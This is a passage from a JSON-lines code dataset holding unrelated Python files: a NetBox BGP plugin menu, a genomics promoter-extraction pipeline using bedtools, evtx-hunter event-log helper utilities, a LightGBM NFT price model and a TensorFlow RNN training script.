pandas.\n","repo_name":"mandab749/State_of_Data_Science","sub_path":"Word_Cloud_queries.py","file_name":"Word_Cloud_queries.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"70831663130","text":"from django.conf import settings\n\nfrom extras.plugins import PluginMenuButton, PluginMenuItem, PluginMenu\nfrom utilities.choices import ButtonColorChoices\n\n\n_menu_items = (\n PluginMenuItem(\n link='plugins:netbox_bgp:community_list',\n link_text='Communities',\n permissions=['netbox_bgp.view_community'],\n buttons=(\n PluginMenuButton(\n link='plugins:netbox_bgp:community_add',\n title='Communities',\n icon_class='mdi mdi-plus-thick',\n color=ButtonColorChoices.GREEN,\n permissions=['netbox_bgp.add_community'],\n ),\n ),\n ),\n PluginMenuItem(\n link='plugins:netbox_bgp:bgpsession_list',\n link_text='Sessions',\n permissions=['netbox_bgp.view_bgpsession'],\n buttons=(\n PluginMenuButton(\n link='plugins:netbox_bgp:bgpsession_add',\n title='Sessions',\n icon_class='mdi mdi-plus-thick',\n color=ButtonColorChoices.GREEN,\n permissions=['netbox_bgp.add_bgpsession'],\n ),\n ),\n ),\n PluginMenuItem(\n link='plugins:netbox_bgp:routingpolicy_list',\n link_text='Routing Policies',\n permissions=['netbox_bgp.view_routingpolicy'],\n buttons=(\n PluginMenuButton(\n link='plugins:netbox_bgp:routingpolicy_add',\n title='Routing Policies',\n icon_class='mdi mdi-plus-thick',\n color=ButtonColorChoices.GREEN,\n permissions=['netbox_bgp.add_routingpolicy'],\n ),\n ),\n ),\n PluginMenuItem(\n link='plugins:netbox_bgp:prefixlist_list',\n link_text='Prefix Lists',\n
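# note: the view permission gates the menu entry itself; the add permission gates its green button\n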
permissions=['netbox_bgp.view_prefixlist'],\n buttons=(\n PluginMenuButton(\n link='plugins:netbox_bgp:prefixlist_add',\n title='Prefix Lists',\n icon_class='mdi mdi-plus-thick',\n color=ButtonColorChoices.GREEN,\n permissions=['netbox_bgp.add_prefixlist'],\n ),\n ),\n ),\n PluginMenuItem(\n link='plugins:netbox_bgp:bgppeergroup_list',\n link_text='Peer Groups',\n permissions=['netbox_bgp.view_bgppeergroup'],\n buttons=(\n PluginMenuButton(\n link='plugins:netbox_bgp:bgppeergroup_add',\n title='Peer Groups',\n icon_class='mdi mdi-plus-thick',\n color=ButtonColorChoices.GREEN,\n permissions=['netbox_bgp.add_bgppeergroup'],\n ),\n ),\n )\n)\n\nplugin_settings = settings.PLUGINS_CONFIG.get('netbox_bgp', {})\n\nif plugin_settings.get('top_level_menu'):\n menu = PluginMenu( \n label=\"BGP\",\n groups=((\"BGP\", _menu_items),),\n icon_class=\"mdi mdi-bootstrap\",\n )\nelse:\n menu_items = _menu_items\n","repo_name":"k01ek/netbox-bgp","sub_path":"netbox_bgp/navigation.py","file_name":"navigation.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","stars":189,"dataset":"github-code","pt":"32"}
{"seq_id":"6268192961","text":"\"\"\" Scripts with helper functions to download and process gene sequences\n using raw DNA sequences and annotation files.\n\"\"\"\nimport os\nfrom Bio import SeqIO\nfrom . import config, utils\n\n\n# Define Global Vars\nANNOT_SUFFIX_DICT = {'Ensembl': 'gff3',\n 'Refseq': 'gff',\n 'Maize': 'gff3',\n 'Maize_addition': 'gff3',\n 'Maize_nam': 'gff3'}\nGENE_SUFFIX_DICT = {'Ensembl': 'fa',\n 'Refseq': 'fna',\n 'Maize': 'fa',\n 'Maize_addition': 'fa',\n 'Maize_nam': 'fa'}\n\n\n# Helper functions for downloading data from the selected database\ndef generate_directories(db_name):\n \"\"\" Creates the raw and processed data directories for the given database\n Params:\n db_name: str, name of the database to be processed\n \"\"\"\n # Create paths to be added\n db_path = config.data_raw / db_name\n dna_path = db_path / 'dna'\n annot_path = db_path / 'annot'\n processed_db_path = config.data_processed / db_name\n\n for path in [db_path, dna_path, annot_path, processed_db_path]:\n if not os.path.exists(path):\n os.mkdir(path)\n\n\ndef faidx(dna_path, dna_name):\n \"\"\" Adapted from Inari notebook. Used to extract .fai from .fa file\n Params:\n dna_path: str, directory for the .fa/.fna dna file\n dna_name: str, name for dna .fa/.fna file\n \"\"\"\n exe_str = f\"{config.samtools} faidx {os.path.join(dna_path, dna_name)}\"\n utils.execute(exe_str)\n\n\ndef extract_flanking_region(annot_name, annot_path, db_name):\n \"\"\" Adapted from Inari notebook. Used to extract the flanking region.\n Generates a .gene.gff3/gff file using the .gff3/gff file.\n Params:\n annot_name: str, name of the annotation .gff3 file\n annot_path: str, directory that stores the gff3 file\n db_name: str, name of the database to be processed\n \"\"\"\n # Generate input and output file names\n in_path = os.path.join(annot_path, annot_name)\n suffix = ANNOT_SUFFIX_DICT[db_name]\n out_path = in_path.replace(f\".{suffix}\", f\".gene.{suffix}\")\n exe_str = f\"grep -P '\\tgene\\t' {in_path} > {out_path}\" # -P for ubuntu, -p for linux\n utils.execute(exe_str)\n\n\n
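# note: bedtools flank reads chromosome sizes from the .fai index produced by faidx() above\n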
def get_1kbup(dna_name, annot_name, dna_path, annot_path, regulatory_len, db_name):\n \"\"\" Adapted from Inari notebook. Creates the .gene.1kbup.gff3 file\n using the .gene.gff3 generated using extract_flanking_region.\n Params:\n dna_name: str, name for dna .fa/fna file\n annot_name: str, name of the annotation .gff3/gff file\n dna_path: str, directory for the .fa/fna dna file\n annot_path: str, directory that stores the gff3/gff file\n regulatory_len: int, length of regulatory region to be extracted\n db_name: str, name of the database to be processed\n \"\"\"\n # Generate input and output file names\n suffix = ANNOT_SUFFIX_DICT[db_name]\n annot_gene = annot_name.replace(f\".{suffix}\", f\".gene.{suffix}\")\n annot_1kbup = annot_name.replace(f\".{suffix}\", f\".gene.1kbup.{suffix}\")\n\n # Create the exe command to get 1kbup\n exe_str = f\"{config.bedtools} flank -i \"\n exe_str += f\"{os.path.join(annot_path, annot_gene)} \"\n exe_str += f\"-g {os.path.join(dna_path, dna_name)}.fai \"\n exe_str += f\"-l {str(regulatory_len)} \"\n exe_str += \"-r 0 \"\n exe_str += \"-s \"\n exe_str += f\"> {os.path.join(annot_path, annot_1kbup)}\"\n utils.execute(exe_str)\n\n\ndef subtract(dna_name, annot_name, annot_path, db_name):\n ''' Adapted from Inari notebook. Apply Bedtools subtract to subtract genic\n regions of neighbouring genes from the intergenic flanks.\n Params:\n dna_name: str, name for dna .fa/fna file\n annot_name: str, name of the annotation .gff3/gff file\n annot_path: str, directory that stores the gff3/gff file\n db_name: str, name of the database to be processed\n '''\n # Generate input and output file names\n suffix = ANNOT_SUFFIX_DICT[db_name]\n annot_gene = annot_name.replace(f\".{suffix}\", f\".gene.{suffix}\")\n annot_1kbup = annot_name.replace(f\".{suffix}\", f\".gene.1kbup.{suffix}\")\n annot_nov = annot_name.replace(f\".{suffix}\", f\".gene.1kbup.nov.{suffix}\")\n\n exe_str = f\"{config.bedtools} subtract -a \" + \\\n os.path.join(annot_path, annot_1kbup)\n exe_str += \" -b \" + os.path.join(annot_path, annot_gene)\n exe_str += \" > \" + os.path.join(annot_path, annot_nov)\n utils.execute(exe_str)\n\n\ndef remove_split_fragments(annot_name, annot_path, db_name):\n ''' Go over the gtf file and if multiple promoter fragments for one gene:\n retain only last one (largest coordinates) in case of positive strand\n retain only first one (smallest coordinates) in case of negative strand\n Params:\n annot_name: str, name of the annotation .gff3 file\n annot_path: str, directory that stores the gff3 file\n db_name: str, name of the database to be processed\n '''\n suffix = ANNOT_SUFFIX_DICT[db_name]\n annot_nov = annot_name.replace(f\".{suffix}\", f\".gene.1kbup.nov.{suffix}\")\n annot_final = annot_name.replace(f\".{suffix}\", f\".gene.1kbup.nov.final.{suffix}\")\n\n # Read in all the extracted regions\n with open(os.path.join(annot_path, annot_nov)) as gtf_fh_in:\n fragment_dict = {}\n orientation_dict = {}\n for line in gtf_fh_in:\n line = line.rstrip()\n line_list = line.split('\\t')\n if db_name == 'Ensembl':\n gene_id_temp = line_list[-1].split(';')[0]\n gene_id = gene_id_temp.split(\":\")[1]\n elif db_name == 'Refseq':\n gene_id_temp = line_list[-1].split(';')[1]\n gene_id = gene_id_temp.split(\":\")[1]\n elif db_name == 'Maize':\n gene_id_temp = line_list[-1].split(';')[0]\n gene_id = gene_id_temp.split(':')[1]\n else:\n gene_id_temp = line_list[-1].split(';')[0]\n gene_id = gene_id_temp.split('=')[1]\n orientation = line_list[6]\n line_list[2] = gene_id\n orientation_dict[gene_id] = orientation\n if gene_id not in fragment_dict:\n fragment_dict[gene_id] = []\n
fragment_dict[gene_id].append(\"\\t\".join(line_list))\n\n # Write out only the retained ones\n with open(os.path.join(annot_path, annot_final), \"w\") as gtf_fh_out:\n for gene_id in fragment_dict:\n if orientation_dict[gene_id] == '+':\n # take fragment with highest coords, which is latest one added\n gtf_fh_out.write(\"{}\\n\".format(fragment_dict[gene_id][-1]))\n else:\n # orientation == -\n # take fragment with lowest coords, which is first one added\n gtf_fh_out.write(\"{}\\n\".format(fragment_dict[gene_id][0]))\n\n\ndef extract_sequence(dna_name, annot_name, dna_path, annot_path, save_path, db_name):\n ''' Adapted from Inari notebook. Uses Bedtools getfasta to extract\n the final sequences, w/ extension \".gene.1kbup.nov.final.fa\".\n Params:\n dna_name: str, name for dna .fa file\n annot_name: str, name of the annotation .gff3 file\n dna_path: str, directory for the .fa dna file\n annot_path: str, directory that stores the gff3 file\n save_path: str, directory for the output .fa file\n db_name: str, name of the database to be processed\n '''\n # Generate input and output file names\n suffix = ANNOT_SUFFIX_DICT[db_name]\n suffix_g = GENE_SUFFIX_DICT[db_name]\n annot_final = annot_name.replace(f\".{suffix}\", f\".gene.1kbup.nov.final.{suffix}\")\n dna_final = dna_name.replace(f\".{suffix_g}\", f\".gene.1kbup.nov.final.{suffix_g}\")\n\n exe_str = f\"{config.bedtools} getfasta -fi \" + \\\n os.path.join(dna_path, dna_name)\n exe_str += \" -bed \" + os.path.join(annot_path, annot_final)\n exe_str += \" -s -name+ > \"\n exe_str += os.path.join(save_path, dna_final)\n utils.execute(exe_str)\n\n\ndef generate_sequence_for_species(dna_name, annot_name, dna_url, annot_url,\n dna_path, annot_path, save_path, db_name,\n species_name, regulatory_len=1000):\n \"\"\" The main function that chains the above methods together to extract the\n relevant sequences from the initial .fa/fna dna file and .gff3/gff\n annotation file downloaded from the Ensembl database.\n Params:\n dna_name: str, name for dna .fa/fna file\n annot_name: str, name of the annotation .gff3/gff file\n dna_url: str, url to download the .fa/fna file\n annot_url: str, url to download the .gff3/gff file\n dna_path: str, directory for the .fa/fna dna file\n annot_path: str, directory that stores the gff3/gff file\n save_path: str, directory for the output .fa/fna file\n db_name: str, name of the database to be processed\n species_name: str, name of species\n regulatory_len: int, length of regulatory region to be extracted\n \"\"\"\n # Generate directories\n generate_directories(db_name)\n\n # Create species-specific directory\n species_name = species_name.strip().lower()\n dna_path_s = dna_path / species_name\n annot_path_s = annot_path / species_name\n save_path = save_path / species_name\n for path in [dna_path_s, annot_path_s, save_path]:\n if not os.path.exists(path):\n os.mkdir(path)\n\n # Download the raw fa and gff files\n utils.download(dna_url, dna_path_s, db_name, dna_name)\n utils.download(annot_url, annot_path_s, db_name, annot_name)\n\n # Unzip the gz files\n utils.unzip(dna_path_s, dna_name)\n utils.unzip(annot_path_s, annot_name)\n\n # Run Faidx command\n faidx(dna_path_s, dna_name)\n\n # Only extract the flanking regions for the genes\n extract_flanking_region(annot_name, annot_path_s, db_name)\n\n # Get 1kbup file\n get_1kbup(dna_name, annot_name, dna_path_s, annot_path_s, regulatory_len, db_name)\n\n # Bedtools to subtract genic regions of neighbouring genes\n # from the intergenic flanks\n subtract(dna_name,
annot_name, annot_path_s, db_name)\n\n # Remove Split fragments\n remove_split_fragments(annot_name, annot_path_s, db_name)\n\n # Extract the resulting sequence\n extract_sequence(dna_name, annot_name, dna_path_s, annot_path_s, save_path, db_name)\n\n # Remove raw sequence files\n utils.clear_folder(dna_path_s, to_continue='y')\n # utils.clear_folder(annot_path_s, to_continue='y')\n\n\ndef load_processed_fa(processed_db_path, dna_name, db_name, species_name):\n \"\"\" Helper function to load sequences with name dna_name.\n Params:\n processed_db_path: db_path within processed data folder\n dna_name: name of the .fa/fna file to be loaded\n db_name: str, name of the database to be processed\n species_name: str, name of species\n \"\"\"\n suffix_g = GENE_SUFFIX_DICT[db_name]\n dna_final = dna_name.replace(f\".{suffix_g}\", f\".gene.1kbup.nov.final.{suffix_g}\")\n f_path = os.path.join(processed_db_path, species_name, dna_final)\n fasta_sequences = SeqIO.parse(open(f_path), 'fasta')\n return fasta_sequences\n","repo_name":"benlevyx/florabert","sub_path":"module/inari/gene_db_io.py","file_name":"gene_db_io.py","file_ext":"py","file_size_in_byte":11309,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"21087709708","text":"import os\nimport glob\nimport logging\nimport jsonlines\nimport vars\nimport json\nimport pandas as pd\nimport platform\n\n\ndef create_log_fields_string(event, log_fields):\n output_strings = list()\n for field in log_fields:\n if field in event[\"Event\"][\"EventData\"]:\n output_strings.append(field + \":\" + event[\"Event\"][\"EventData\"][field])\n\n return \"\\n\\n\".join(output_strings)\n\n\ndef dict_flatten(in_dict, dict_out=None, parent_key=None, separator=\".\"):\n if dict_out is None:\n dict_out = {}\n\n for k, v in in_dict.items():\n k = f\"{parent_key}{separator}{k}\" if parent_key else k\n if isinstance(v, dict):\n dict_flatten(in_dict=v, dict_out=dict_out, parent_key=k)\n continue\n\n dict_out[k] = v\n\n return dict_out\n\n\ndef normalize_event(event):\n flattened_dict = dict_flatten(event)\n\n event_id = event[\"Event\"][\"System\"][\"EventID\"]\n if type(event_id) != int:\n event[\"Event\"][\"System\"][\"EventID\"] = event_id[\"#text\"]\n\n if \"EventData\" not in event[\"Event\"].keys() or event[\"Event\"][\"EventData\"] is None:\n event[\"Event\"][\"EventData\"] = dict()\n\n for k in event[\"Event\"][\"System\"].keys():\n event[\"Event\"][\"EventData\"][k] = event[\"Event\"][\"System\"][k]\n\n for k in event[\"Event\"].keys():\n if k != \"EventData\":\n event[\"Event\"][\"EventData\"][k] = event[\"Event\"][k]\n\n if \"UserData\" in event[\"Event\"].keys():\n for k in event[\"Event\"][\"UserData\"].keys():\n event[\"Event\"][\"EventData\"][k] = dict()\n for k_ in event[\"Event\"][\"UserData\"][k].keys():\n event[\"Event\"][\"EventData\"][k][k_] = event[\"Event\"][\"UserData\"][k][k_]\n\n for k, v in flattened_dict.items():\n event[\"Event\"][\"EventData\"][k.split(\".\")[-1]] = v\n\n return event\n\n\ndef retrieve_all_occurence_rules():\n for rule_info in json.load(open(vars.RULE_DIR + \"interesting_events.json\", 'r'))[\"rules\"]:\n yield rule_info\n\n\ndef retrieve_all_first_occurence_rules():\n for rule_info in json.load(open(vars.RULE_DIR + \"first_occurence.json\", 'r'))[\"rules\"]:\n yield rule_info\n\n\ndef retrieve_all_events():\n for file_info in json.load(open(vars.TMP_DIR + \"files.json\", 'r'))[\"files\"]:\n with jsonlines.open(file_info[\"json_dump_filename\"]) as reader:\n for item in 
reader:\n yield item\n\n\ndef get_description_for_event_id(event_id):\n event_id = int(event_id)\n description_loc = vars.EVENT_ID_MAPPING[vars.EVENT_ID_MAPPING['event_id'] == event_id]\n return ', '.join(description_loc[\"description\"].tolist())\n\n\ndef load_event_id_mappings():\n df = pd.read_csv(vars.EXTERNAL_DIR + \"event_id_mapping.csv\", delimiter=\";\")\n\n # using dictionary to convert specific columns\n convert_dict = {'event_id': int}\n df = df.astype(convert_dict)\n vars.EVENT_ID_MAPPING = df\n\n\ndef get_all_event_channels():\n event_channels = set()\n for file_info in json.load(open(vars.TMP_DIR + \"files.json\", 'r'))[\"files\"]:\n event_channels.update(list(file_info[\"event_channel_counts\"].keys()))\n\n return list(event_channels)\n\n\ndef get_recursive_filenames(path, file_suffix):\n filenames = list()\n\n for subdir, dirs, files in os.walk(path):\n for file in files:\n filename = os.path.join(subdir, file)\n if filename.endswith(file_suffix):\n filenames.append(filename)\n\n return filenames\n\n\ndef remove_all_tmp_json_files():\n files = glob.glob(vars.TMP_DIR + \"/evtx_dump/*.json\")\n for f in files:\n os.remove(f)\n\n\ndef setup_logger():\n logger = logging.getLogger('evtx-hunter')\n logger.setLevel(logging.DEBUG)\n\n # create console handler and set level to debug\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n\n # create formatter\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n # add formatter to ch\n ch.setFormatter(formatter)\n\n # add ch to logger\n logger.addHandler(ch)\n\n return logger\n\n\ndef sort_dict(_dict, reverse=False):\n event_summary_list = sorted(_dict.items(), key=lambda x: x[1], reverse=reverse)\n return dict(event_summary_list)\n\n\ndef is_cygwin():\n return platform.system().startswith(\"CYGWIN\")\n\n\ndef is_64_bit():\n return os.uname().machine == \"x86_64\"\n\n\ndef get_cygwin_root():\n return \"/cygwin\" + (\"64/\" if is_64_bit() else \"/\")\n\n\ndef set_cygwin_vars():\n if is_cygwin():\n vars.CYGWIN = True\n vars.CYGWIN_DIR = get_cygwin_root()\n vars.CYGDRIVE_DIR = \"/cygdrive/\"\n else:\n vars.CYGWIN = False\n\n\n# Forwards the original path or corrects it for Cygwin\ndef path_for_exe(path):\n # Path from Cygwin must be corrected before it can be used with .exe\n if vars.CYGWIN:\n # Ensures that the path is absolute \n path = os.path.abspath(path)\n # Path leads to a place within Windows filesystem\n if path.startswith(vars.CYGDRIVE_DIR):\n # Deletes the cygrdive prefix and the drive letter\n path = path[11:]\n # Path leads to a place within Linux filesystem\n else:\n # Adds the Cygwin prefix so .exe can reach the place\n path = vars.CYGWIN_DIR + path\n return path\n","repo_name":"NVISOsecurity/evtx-hunter","sub_path":"app/helpers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5208,"program_lang":"python","lang":"en","doc_type":"code","stars":129,"dataset":"github-code","pt":"32"} +{"seq_id":"73296511452","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun May 28 14:20:05 2023\r\n\r\n@author: efthi\r\n\"\"\"\r\n\r\n#import lightgbm as lgb\r\nimport numpy as np\r\nfrom sklearn.model_selection import cross_val_score, KFold\r\nfrom sklearn.metrics import mean_squared_error\r\nimport pandas as pd\r\nfrom sklearn.preprocessing import LabelEncoder\r\nimport lightgbm as lgb\r\n\r\nlabel_encoder = LabelEncoder()\r\n\r\n\r\n# Assuming you have your features (X) and target variable (y) ready\r\nEtherium_price = 
pd.read_csv(r\"C:\\Users\\efthi\\Downloads\\cryptopunks_test_bundle\\20230509\\eth_usd_fx_rates.csv\")\r\ntokens_metadate = pd.read_csv(r\"C:\\Users\\efthi\\Downloads\\cryptopunks_test_bundle\\20230509\\token_metadata.csv\")\r\ntokens_sales = pd.read_csv(r\"C:\\Users\\efthi\\Downloads\\cryptopunks_test_bundle\\20230509\\token_sales.csv\")\r\n\r\n\r\n'''\r\nMerged and sorted given the token \r\nindex firstly and then the timestamp\r\n'''\r\nData = pd.merge(tokens_metadate, tokens_sales, on='token_index')\r\nData = Data.filter(regex='^(?!Unnamed)')\r\n\r\n\r\ncat_features = ['Skin Tone', \"Type\", \"Hair\",\r\n \"Eyewear\", \"Mouth\", \"Headwear\",\r\n \"Facial Hair\", \"Smoking Device\",\r\n \"Other:Earring\", \"Neckwear\",\r\n \"Skin Feature\", \"Other:Medical Mask\",\r\n \"Other:Clown Nose\", \"Trait Count\",\r\n \"rarest_property_name\"]\r\n\r\nfor feature in cat_features:\r\n Data[feature] = Data[feature].astype('category').cat.codes\r\n\r\n\r\nimport re\r\nData = Data.rename(columns = lambda x:re.sub('[^A-Za-z0-9_]+', '', x))\r\n\r\n\r\n\"\"\"\r\ncreate a dataset with the unique nft which \r\nare sold only once so we dont have historic data to train our model\r\n\"\"\"\r\n# Identify duplicate rows\r\nduplicates = Data.duplicated(subset= \"token_index\", keep=False)\r\ndf_duplicates = Data[duplicates]\r\ndf_unique = Data[~duplicates]\r\n\r\n\r\n'''\r\nThis \"test\" dataset contains only the token \r\nwith the last sold price given the timestamp plus the unique tokens\r\nwhich might be sold only once\r\n'''\r\n# Sort the dataframe by 'timestamp' in descending order\r\ndf_sorted = Data.sort_values(by='timestamp', ascending=False)\r\n\r\n# Drop duplicates based on 'token_index' while keeping the row with the largest 'timestamp'\r\nTest_data = df_sorted.drop_duplicates(subset='token_index', keep='first')\r\n\r\nX_test = Test_data.drop(columns=[\"eth\",'usd'])\r\nY_test = Test_data.loc[:, Test_data.columns == 'eth']\r\n\r\n\r\n\r\n'''\r\nKeep the data which have been sold more than once.\r\n'''\r\nTrain_data_x = df_sorted[~df_sorted['timestamp'].isin(Test_data['timestamp'])]\r\nTrain_data = Train_data_x[~Train_data_x['token_index'].isin(df_unique['token_index'])]\r\n\r\nX_train = Train_data.drop(columns=[\"eth\",'usd'])\r\ny_train = Train_data.loc[:, Train_data.columns == 'eth']\r\n\r\n\r\n\r\n# Create a LightGBM dataset\r\ntrain_data = lgb.Dataset(X_train, label=y_train)\r\n\r\n\r\nparams = {\r\n 'boosting_type': 'gbdt',\r\n 'objective': 'regression',\r\n 'metric': 'mse',\r\n 'num_leaves': 100,\r\n 'learning_rate': 0.05,\r\n 'feature_fraction': 0.9,\r\n 'bagging_fraction': 0.8,\r\n 'bagging_freq': 5,\r\n 'verbose': 0\r\n}\r\n\r\n# Train the model\r\nnum_rounds = 100\r\nmodel = lgb.train(params, train_data, num_rounds)\r\n\r\n# Make predictions on the testing set\r\ny_pred = model.predict(X_test)\r\n\r\n# Evaluate the model\r\nmse = mean_squared_error(Y_test, y_pred)\r\nprint('Mean Squared Error:', mse)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"EfthyvoulosDrousiotis/NFT_valuation","sub_path":"NFT_valuations.py","file_name":"NFT_valuations.py","file_ext":"py","file_size_in_byte":3300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34036293525","text":"import tensorflow as tf\r\nimport numpy as np\r\n\r\n\r\n\r\n\r\n\r\ntruncatedBackpropLength = 5\r\nnumOfInputNodes = 1\r\nnumOfOutputNodes = 2\r\n\r\nnumOfHiddenNodes = 6\r\n\r\nbatchSize = 4\r\n\r\nrandScaler = 0.01\r\n\r\n\r\n\r\nsess = tf.Session()\r\n\r\nx_batch = 
tf.placeholder(tf.float32, shape=[None, truncatedBackpropLength, numOfInputNodes])\r\ny_batch = tf.placeholder(tf.float32, shape=[None, truncatedBackpropLength, numOfOutputNodes])\r\n\r\n\r\nx_list = []\r\n\r\nW2 = tf.Variable(np.random.rand(numOfInputNodes,numOfHiddenNodes)*randScaler, dtype=tf.float32)\r\nb_hidden = tf.Variable(tf.zeros([numOfHiddenNodes]))\r\n\r\nW3 = tf.Variable(np.random.rand(numOfHiddenNodes,numOfHiddenNodes)*randScaler, dtype=tf.float32)\r\ncontext = tf.Variable(tf.zeros([batchSize, numOfHiddenNodes]), dtype=tf.float32)\r\n\r\nW4 = tf.Variable(np.random.rand(numOfHiddenNodes,numOfOutputNodes)*randScaler, dtype=tf.float32)\r\nb_output = tf.Variable(tf.zeros([numOfOutputNodes]))\r\n\r\ncross_entropy_sum = tf.Variable(tf.zeros([1]))\r\naccuracy_list = []\r\n\r\n\r\nfor seriesStep in range (truncatedBackpropLength):\r\n xTemp = tf.squeeze(tf.slice(x_batch, [0,seriesStep,0], [-1, 1, -1]))\r\n y_label = tf.squeeze(tf.slice(y_batch, [0,seriesStep,0], [-1, 1, -1]))\r\n\r\n if (numOfInputNodes == 1):\r\n \txTemp = tf.reshape(xTemp, [batchSize, numOfInputNodes])\r\n \ty_label = tf.reshape(y_label, [batchSize, numOfOutputNodes])\r\n\r\n x_list.append(xTemp)\r\n\r\n\r\n \r\n hidden = tf.matmul(xTemp,W2) + tf.matmul(context,W3) + b_hidden\r\n \r\n # context = hidden\r\n hidden_clipped = tf.nn.tanh(hidden) \r\n context = hidden_clipped\r\n output = tf.matmul(hidden_clipped, W4) + b_output\r\n \r\n\r\n y_predicted = tf.nn.softmax(output)\r\n\r\n \r\n correct_prediction = tf.equal(tf.argmax(y_predicted,1), tf.argmax(y_label,1))\r\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\n accuracy_list.append(accuracy)\r\n \r\n cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_label * tf.log(y_predicted), reduction_indices=[1]))\r\n cross_entropy_sum = cross_entropy_sum + cross_entropy\r\n\r\ncontext_final = context\r\ncross_final = cross_entropy_sum\r\nLEARNING_RATE = 0.05\r\ntraining = tf.train.GradientDescentOptimizer(LEARNING_RATE).minimize(cross_entropy_sum)\r\n\r\nx_final = x_list\r\naccuracy_final = accuracy_list\r\n\r\n\r\n \r\n\r\ninit = tf.global_variables_initializer()\r\nsess.run(init)\r\n\r\nimport numpy as np\r\n\r\n# Start= [1,0,0,0,0,0,0]\r\n# Coffee= [0,1,0,0,0,0,0];\r\n# Tea= [0,0,1,0,0,0,0];\r\n# Water= [0,0,0,1,0,0,0];\r\n# Cream= [0,0,0,0,1,0,0];\r\n# Sugar= [0,0,0,0,0,1,0];\r\n# Stir= [0,0,0,0,0,0,1];\r\n\r\n\r\n# # %%% output; this is the teacher output \r\n# Coffeeout= [1,0,0,0,0,0,0,0]; \r\n# Teaout= [0,1,0,0,0,0,0,0];\r\n# Waterout= [0,0,1,0,0,0,0,0];\r\n# Creamout= [0,0,0,1,0,0,0,0];\r\n# Sugarout= [0,0,0,0,1,0,0,0];\r\n# Stirout= [0,0,0,0,0,1,0,0];\r\n# Coffeebev= [0,0,0,0,0,0,1,0];\r\n# Teabev= [0,0,0,0,0,0,0,1];\r\n\r\n# inputBatch = []\r\n# outputBatch = []\r\n\r\n# # %%% Seq1 tea water second \r\n\r\n# TWInp=[Start,Tea,Water,Stir,Sugar,Stir]\r\n# TWOut=[Teaout,Waterout,Stirout,Sugarout,Stirout,Teabev]\r\n\r\n# inputBatch.append(TWInp)\r\n# outputBatch.append(TWOut)\r\n\r\n# # %%% Seq2 tea water second \r\n\r\n# TSInp=[Start,Tea,Sugar,Stir,Water,Stir]\r\n# TSOut=[Teaout,Sugarout,Stirout,Waterout,Stirout,Teabev]\r\n\r\n# inputBatch.append(TSInp)\r\n# outputBatch.append(TSOut)\r\n\r\n\r\n# # %%% Seq3 coffee water first \r\n\r\n# CWInp=[Start,Coffee,Water,Stir,Cream,Stir]\r\n# CWOut=[Coffeeout,Waterout,Stirout,Creamout,Stirout,Coffeebev]\r\n\r\n# inputBatch.append(CWInp)\r\n# outputBatch.append(CWOut)\r\n\r\n\r\n# # %%% Seq4 coffee water second\r\n\r\n# CCInp=[Start,Coffee,Cream,Stir,Water,Stir]\r\n# 
CCOut=[Coffeeout,Creamout,Stirout,Waterout,Stirout,Coffeebev]\r\n\r\n# inputBatch.append(CCInp)\r\n# outputBatch.append(CCOut)\r\n\r\n\r\ntotal_series_length = 50000\r\necho_step = truncatedBackpropLength\r\nbatch_length = int(total_series_length/batchSize)\r\n\r\ndef generateData():\r\n\tx = np.array(np.random.choice(2, total_series_length, p=[0.5, 0.5]))\r\n\ty = np.roll(x, echo_step)\r\n\ty[0:echo_step] = 0\r\n\r\n\ty_hot = [(1-yTemp)*[1,0] + yTemp*[0,1] for yTemp in y]\r\n\r\n\r\n\ty_hot_list = []\r\n\tfor i in range(batchSize):\r\n\t\ty_hot_Temp = y_hot[i*batch_length:i*batch_length+batch_length]\r\n\t\ty_hot_list.append(y_hot_Temp)\r\n\r\n\tx = x.reshape((batchSize, batch_length)) # The first index changing slowest, subseries as rows\r\n\t# y_hot = y_hot.reshape((batchSize, batch_length))\r\n\r\n\treturn (x, y_hot_list)\r\n\r\n\r\nx, y = generateData()\r\n\r\nprint('Size of X: ' + str(len(x)) + '*' + str(len(x[0])))\r\nprint('Size of Y: ' + str(len(y)) + '*' + str(len(y[0])))\r\n\r\nimport random\r\n\r\nTRAIN_STEPS = 50000\r\nweightList1 = []\r\nweightList2 = []\r\nweightList3 = []\r\nweightList4 = []\r\n# with sess.as_default():\r\nfor i in range(TRAIN_STEPS):\r\n\t# randIndex = random.randint(truncatedBackpropLength, len(x[0]))\r\n\trandIndex = i+truncatedBackpropLength\r\n\r\n\tx_train = x[:,randIndex-truncatedBackpropLength:randIndex]\r\n\ty_train = [tempRow[randIndex-truncatedBackpropLength:randIndex] for tempRow in y]\r\n\t# y[:,randIndex-truncatedBackpropLength:randIndex]\r\n\r\n\tx_train = x_train.reshape((batchSize, truncatedBackpropLength, 1))\r\n\t# y_train = y_train.reshape((batchSize, truncatedBackpropLength, 2))\r\n\r\n\r\n\tsess.run(training, feed_dict={x_batch: x_train, y_batch: y_train})\r\n\r\n\tif (i%100==0):\r\n\t\t# randIndex = random.randint(truncatedBackpropLength, len(x[0]))\r\n\t\trandIndex = i+truncatedBackpropLength\r\n\r\n\t\tx_test = x[:,randIndex-truncatedBackpropLength:randIndex]\r\n\t\ty_test = [tempRow[randIndex-truncatedBackpropLength:randIndex] for tempRow in y]\r\n\t\t# y[:,randIndex-truncatedBackpropLength:randIndex]\r\n\r\n\t\tx_test = x_test.reshape((batchSize, truncatedBackpropLength, 1))\r\n\t\t# y_test = y_test.reshape((batchSize, truncatedBackpropLength, 1))\r\n\r\n\t\t# print('input: ')\r\n\t\t# print(x_test)\r\n\r\n\t\tprint('Training Step: ' + str(i) + ' Accuracy = ' + str(sess.run(accuracy_final, feed_dict={x_batch: x_train, y_batch: y_train})) + ' Loss = ' + str(sess.run(cross_final, {x_batch: x_train, y_batch: y_train})))\r\n\t\t\r\n\t\tb = 